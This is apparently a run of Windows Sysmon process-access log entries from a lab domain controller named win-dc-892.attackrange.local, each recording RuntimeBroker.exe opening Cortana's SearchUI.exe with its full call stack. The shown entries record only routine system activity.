12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 